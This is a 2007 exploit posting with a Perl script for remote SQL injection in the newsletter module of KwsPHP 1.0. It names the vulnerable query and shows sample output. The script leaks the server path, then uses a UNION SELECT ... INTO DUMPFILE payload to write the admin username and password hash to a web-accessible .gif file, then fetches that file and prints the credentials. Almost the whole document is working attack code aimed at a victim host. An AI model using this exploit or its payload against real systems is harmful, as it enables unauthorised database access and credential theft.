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Posted on 12 October 2007

################################################## # Script....................................: KwsPHP ver 1.0 Newsletter Module # Script Site...........................: http://www.kwsphp.org # Vulnerability........................: Remote SQL injection Exploit # Access..................................: Remote # level......................................: Dangerous # Author..................................: S4mi # Contact.................................: S4mi[at]LinuxMail.org ################################################## #Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, r0_0t, ddx39 ..... # ################################################## #This Exploit Only When magic_quotes_gpc Is OFF #Vuln Files: #modules ewsletterindex.php # [code] # # line: 94 $req = reqmysql('SELECT pseudo,email FROM users WHERE email="'.$newsletter.'"') ; # line: 95 $rep1 = mysql_fetch_object($req) ; # # [/code] # #************************************************************************** #Screen shot #---------------- #C:>KwsPHP.pl /KwsPHP/ # Connecting .....[OK] # Sending Data ...[OK] #+ Getting the Full path. #+ ---------------- + #+ path: c:public_htmlkwsphp\n # Connecting .....[OK] # Sending Data ...[OK] #+ Getting the injected code. #+ ---------------- + #"union all select pseudo,concat(CHAR(58),CHAR(58),pass,CHAR(44)) from users where id=1 INTO DUMPFILE 'c:/public_html/kwsphp/images/l3eez.gif'/* #+ ---------------- + #+ injecting database. #+ ---------------- + #+ Done! # Connecting .....[OK] # Sending Data ...[OK] #+ Getting user info. #+ ---------------- + #+ username: admin1 #+ Password: e10adc3949ba59abbe56e057f20f883e #C:> ################################################### #!/usr/bin/perl use IO::Socket ; &header(); &usage unless(defined($ARGV[0] && $ARGV[1] )); $host = $ARGV[0]; $path = $ARGV[1]; #print "User Name: "; #$user = <STDIN>; #chop ($user); syswrite STDOUT ," Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die " Unable to connect to $host " unless($sock); syswrite STDOUT, "[OK]"; syswrite STDOUT ," Sending Data ..."; print $sock "GET $path/index.php?mod=newsletter&avert_news=1&newsletter=" HTTP/1.1 "; print $sock "Host: $host "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Cache-Control: no-cache "; print $sock "Connection: Close "; syswrite STDOUT ,"[OK] "; while($answer = <$sock>){ if ($answer =~ /in <b>(.*?)modul(.*?)92/){ print "+ Getting the Full path. "; print "+ ---------------- + "; print "+ path: $1 "; # here we need to replace the "" by "/" in the $1 for the Windoz Servers (didn't $localpath = $1; $fullpath = $localpath."images/l3eez.gif"; } else { print "Can't find the full path "; exit(0); } } $inject = "union all select pseudo,concat(CHAR(58),CHAR(58),pass,CHAR(44)) from users where id=1 INTO DUMPFILE '$fullpath'/*"; syswrite STDOUT ," Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die " Unable to connect to $host " unless($sock); syswrite STDOUT, "[OK]"; syswrite STDOUT ," Sending Data ..."; print $sock "GET $path/index.php?mod=newsletter&avert_news=1&newsletter="$inject HTTP/1.1 "; print $sock "Host: $host "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Cache-Control: no-cache "; print $sock "Connection: Close "; syswrite STDOUT ,"[OK] "; print "+ Getting the injected code. "; print "+ ---------------- + "; print "$host$path/index.php?mod=newsletter&avert_news=1&newsletter="$inject "; print "+ ---------------- + "; print "+ injecting database. "; print "+ ---------------- + "; #here need to connect to the new created file created from the sql injection (user::password,) syswrite STDOUT ," Connecting ..."; my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",); die " Unable to connect to $host " unless($sock); syswrite STDOUT, "[OK]"; syswrite STDOUT ," Sending Data ..."; print $sock "GET $path/images/l3eez.gif HTTP/1.1 "; print $sock "Host: $host "; print $sock "Referer: $host "; print $sock "Accept-Language: en-us "; print $sock "Content-Type: application/x-www-form-urlencoded "; print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4 "; print $sock "Cache-Control: no-cache "; print $sock "Connection: Close "; syswrite STDOUT ,"[OK] "; while($answer = <$sock>){ if ($answer =~ /(.*?)::(.*?),/){ print "+ Getting user info. "; print "+ ---------------- + "; print "+ username: $1 "; print "+ Password: $2 "; } } sub usage{ print " Usage : perl $0 host /path/ "; print " Exemple : perl $0 www.victim.com /KwsPHP/ "; exit(0); } sub header(){ print q( ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script......................: KwsPHP ver 1.0 Newsletter Module # Script Site.................: http://www.kwsphp.org # Vulnerability...............: Remote SQL injection Exploit # Access......................: Remote # level.......................: Dangerous # Author......................: S4mi # Contact.....................: S4mi[at]LinuxMail.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ); }